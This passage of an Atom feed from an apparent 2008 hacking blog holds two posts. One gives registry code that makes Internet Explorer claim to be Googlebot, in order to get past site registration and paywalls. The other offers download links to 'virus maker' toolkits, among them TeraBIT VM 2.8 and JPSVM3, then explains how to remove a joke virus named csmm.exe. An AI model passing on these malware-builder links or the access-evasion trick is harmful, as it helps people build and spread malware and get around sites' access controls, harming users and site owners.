returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first….&lt;br /&gt;The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can.&lt;br /&gt;We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:&lt;br /&gt;by changing your browser’s User Agent.&lt;br /&gt;Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.&lt;/p&gt; &lt;p&gt;*********************************************&lt;/p&gt; &lt;p&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Internet Settings\5.0\User Agent]&lt;br /&gt;@=”Googlebot/2.1″&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Internet Settings\5.0\User Agent]&lt;br /&gt;@=”Googlebot/2.1″&lt;br /&gt;“Compatible”=”+http://www.googlebot.com/bot.html&lt;/p&gt; &lt;p&gt;***************************************************&lt;/p&gt; &lt;p&gt;Please Remove The  Spaces Between CurrenVersion\ Internet Settings&lt;/p&gt; &lt;p&gt;“Voila! You’re done!You may always change it back again….&lt;br /&gt;I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site…&lt;br /&gt;To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:&lt;/p&gt; &lt;p&gt;******************************************&lt;/p&gt; &lt;p&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]&lt;br /&gt;@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-476964600982475340?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/476964600982475340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=476964600982475340' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/476964600982475340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/476964600982475340'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/secret-backdoor-to-many-websites.html' title='Secret Backdoor To Many Websites'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-1966411948530952195</id><published>2008-03-07T22:41:00.000-08:00</published><updated>2008-03-08T05:48:19.289-08:00</updated><title type='text'>Hardcore Virus Makers</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_eniK8-MS-uk/R9KYjdUy1uI/AAAAAAAAAAs/-o8pORGd2UU/s1600-h/makerco8.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_eniK8-MS-uk/R9KYjdUy1uI/AAAAAAAAAAs/-o8pORGd2UU/s320/makerco8.png" alt="" id="BLOGGER_PHOTO_ID_5175366656736810722" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_eniK8-MS-uk/R9KY89Uy1vI/AAAAAAAAAA0/u5sdgO8anRs/s1600-h/virusmaker8ul.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://2.bp.blogspot.com/_eniK8-MS-uk/R9KY89Uy1vI/AAAAAAAAAA0/u5sdgO8anRs/s320/virusmaker8ul.jpg" alt="" id="BLOGGER_PHOTO_ID_5175367094823474930" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;    &lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Download:  http://www.megaupload.com/?d=6YPTOAXR&lt;/p&gt; &lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;code&gt;Mirror:   http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html&lt;br /&gt;&lt;/code&gt;&lt;dl&gt;&lt;dt&gt;Code: &lt;a href="http://solutionworld.co.in/Forum/viewtopic.php?f=13&amp;amp;t=934#"&gt;Select all&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;&lt;code&gt;http://jeyjey.persiangig.com/Download/JPSVM3.zip&lt;/code&gt;&lt;/dd&gt;&lt;/dl&gt;&lt;br /&gt;&lt;dl&gt;&lt;dt&gt;Code: &lt;a href="http://solutionworld.co.in/Forum/viewtopic.php?f=13&amp;amp;t=934#"&gt;Select all&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;&lt;code&gt;http://www.megaupload.com/?d=Y356K5W7&lt;/code&gt;&lt;/dd&gt;&lt;/dl&gt; &lt;p&gt;How To Get Virus Off&lt;br /&gt;You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.&lt;/p&gt; &lt;p&gt;1. Go into processes and end the process csmm.exe&lt;br /&gt;2. Go to the toolbar and click start.&lt;br /&gt;3. My computer&lt;br /&gt;4. C:&lt;br /&gt;5. Windows&lt;br /&gt;6. System 32&lt;br /&gt;Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-1966411948530952195?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/1966411948530952195/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=1966411948530952195' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1966411948530952195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1966411948530952195'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/hardcore-virus-makers.html' title='Hardcore Virus Makers'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_eniK8-MS-uk/R9KYjdUy1uI/AAAAAAAAAAs/-o8pORGd2UU/s72-c/makerco8.png' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
